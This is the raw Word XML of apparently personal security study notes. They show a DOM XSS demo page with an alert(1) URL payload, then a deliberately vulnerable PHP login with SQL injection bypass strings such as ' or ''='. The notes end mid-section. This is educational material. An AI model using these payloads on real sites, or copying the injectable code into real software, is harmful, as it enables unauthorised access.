    <w:p w14:paraId="1D7AEC0D" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE7FE0" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C5CFD" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;html lang="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C81A9F" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB20EE4" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;title&gt;My Page&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF22574" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093D12B"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queryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>location.search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">; // Extract the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>queryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> from the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC4C8A"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urlParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>URLSearchParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>queryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">); // parse the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>queryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A135F4" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>urlParams.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>('name')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FBA2A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>('&lt;h1&gt; Hello, ' + name + '!&lt;/h1&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5C603" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7A1204" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1214BE" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2AF71" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E01438A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve">   &lt;h1&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2732">
        <w:t>DOMed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> page&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188D589" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7974986C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09085529" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="1FB7B088" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC1271" w14:textId="0AD28BDB" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C6C5E" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://192.168.1.111/1.html?name=Dheeraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B61A88" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="262498B8" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:r w:rsidRPr="003F2732">
        <w:t>Hello Dheeraj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65037EFE" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="003F2732" w:rsidRDefault="003F2732" w:rsidP="003F2732"/>
    <w:p w14:paraId="522BC04C" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737CFE45" w14:textId="72FF8D5A" w:rsidR="003F2732" w:rsidRPr="00AB6A3F" w:rsidRDefault="003F2732" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````````</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A3F" w:rsidRPr="00AB6A3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D339507" w14:textId="1283AFFF" w:rsidR="003F2732" w:rsidRDefault="00AB6A3F" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="005A53CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.1.111/1.html?name=&lt;script&gt;alert(1)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A34168">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4738CC" w14:textId="6ADF7D02" w:rsidR="00AB6A3F" w:rsidRDefault="00AB6A3F" w:rsidP="003F2732">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57981F" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACEAE70" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A182DA" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B12759" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2A3DBD" w14:textId="7925C2DA" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Login Bypass Using SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A1F5F" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````````````````````````````</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471E639" w14:textId="22025622" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve"> a very old trick.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1C77D" w14:textId="2563D1A4" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>First let us see an example of piece of code that actually creates the Login Page vulnerable to this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAEC5E0" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>=$_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9F672" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>passwrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>=$_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>passwrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0459D" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">$query="select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>username,pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve"> from users where username='$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>' and password='$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>passwrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>' limit 0,1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B557A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>$result=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>mysql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>($query);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B0111" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">$rows = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>mysql_fetch_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD49131" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>if($rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2B821" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE9C1A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>echo "You have Logged in successfully" ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE75EFF" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>create_session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66343666" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17D81E" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAFAC6" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B034BC8" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>Echo "Better Luck Next time";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39B90C" w14:textId="016E4A50" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E5115A" w14:textId="5DEC9B65" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>Now as we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0017DF" w14:textId="591247A2" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve"> Inject ' or ''=' into the Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B45BCE" w14:textId="2D52F8CE" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:t>Logging in with following details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32A8A8" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>Username : ' or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D0A91" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t>Password : ' or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B0A1E" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5422AAB6" w14:textId="77777777" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6E2AC6" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D901440" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQLQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B65BA41" w14:textId="60749980" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````````</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17854177" w14:textId="7431A8E0" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username,pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from users where username='' or ''='' and password='' or ''='' limit 0,1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839DDD3" w14:textId="3028905D" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">so what </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve"> actually did is made the query to return true using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812E963" w14:textId="1F370459" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:t>We can even try and comment out the query using any comment operator like using the following username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089069CA" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username : ' or 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BE9E0" w14:textId="1CAE8587" w:rsidR="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45799240" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC7F64A" w14:textId="77777777" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQLQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44404C66" w14:textId="03431B36" w:rsidR="00275D19" w:rsidRPr="00275D19" w:rsidRDefault="00275D19" w:rsidP="00275D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`````````</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>``````</w:t>
      </w:r>
    </w:p>
